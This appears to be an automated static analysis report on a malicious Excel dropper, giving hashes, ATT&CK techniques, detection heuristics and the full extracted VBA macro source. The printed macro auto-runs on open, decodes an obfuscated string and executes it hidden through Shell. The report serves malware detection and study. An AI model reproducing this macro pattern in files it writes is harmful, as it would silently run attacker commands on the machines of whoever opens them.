Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f0694d38c88c19bf…

MALICIOUS

Office (OLE)

Size: 24.0 KB
Created: 1996-10-08 23:32:33
Authoring application: Microsoft Excel
First seen: 2015-03-15
MD5: f584a24f2423784935912fec4c69cac3
SHA-1: 6b441f8e8b387c0cf55f42a459bc1b6b475df097
SHA-256: f0694d38c88c19bf3f891b90cbed7588a0234895c93f819a88bf27e22550f2fc
Risk Score: 148

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1203 Exploitation for Client Execution

The file is an Excel document containing a Workbook_Open macro, so the code runs automatically when the workbook is opened. This macro calls a function that appears to decode a string constant (subtracting a repeating key from it byte by byte) and then executes the result via the Shell command with the window hidden (vbHide). The ClamAV detection name 'Xls.Dropper.Agent-1582316' suggests this is a dropper. The obfuscated command string and the use of Shell indicate it is designed to download and execute a secondary payload.

Heuristics (4)

  • ClamAV: Xls.Dropper.Agent-1582316 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Dropper.Agent-1582316
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 2 related findings)
    Document contains VBA macro code
  • Potential Shell call in VBA (severity: critical, rule: OLE_VBA_SHELL)
    Matched line in script:
    Shell oPOJidsf, vbHide
  • Workbook_Open macro (severity: low, rule: OLE_VBA_WBOPEN)
    Matched line in script:
    Sub Workbook_Open()

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2349 bytes
SHA-256: eb5f40b662a4fe3d34894743b43b5709aac15a03df14dbcd95dc61523259ec7d
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
    tyrtyaag
End Sub

Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Private Const yY1UL = "NmaYSkhE"
Private Const DDuKQ = "±ЪЕy‚¶€•ЬШѕЕѕРіЩН‡ёгНn•ЇѕК�·°ЧЖјЗ‹»ЗаХѕА™¶ібЏ°ёН«єЦЖЗЗ”–’ЬШЗїЪЙІіКЕё“Џ¶бХЙЌљ—‡џЏЏ†™ †›™ђ‚ЮМіЬЖїёСЫ}СЗМЖЦ–±ОГЂ ’ЌўІ®©xЗІ—јКИ·СР·ЬЄЎЃОЙ°”Љ”sРаѕОПЅsђј“є±~Їµ±ќЦРЅ№УСЅ¶©‡¶МКn’µћ »ЌЄ·ЄЁјЪМґХКИњі–іеЖ”sЮЬЇЯХyxї­›Ѕ†µќґ··ЬЕї»ФЧ—µЏѕЛРЈ"

Sub tyrtyaag()
oPOJidsf = lqjWjFO(DDuKQ, yY1UL)
Shell oPOJidsf, vbHide
End Sub


Attribute VB_Name = "Module2"
Public Function lqjWjFO(ByVal strData As String, ByVal strKey As String)

Dim bData() As Byte
Dim bKey() As Byte
bData = StrConv(strData, vbFromUnicode)
bKey = StrConv(strKey, vbFromUnicode)
For i = 0 To UBound(bData)
If i <= UBound(bKey) Then
bData(i) = bData(i) - bKey(i)
Else
bData(i) = bData(i) - bKey(i Mod UBound(bKey))
End If
Next i
 lqjWjFO = StrConv(bData, vbUnicode)
End Function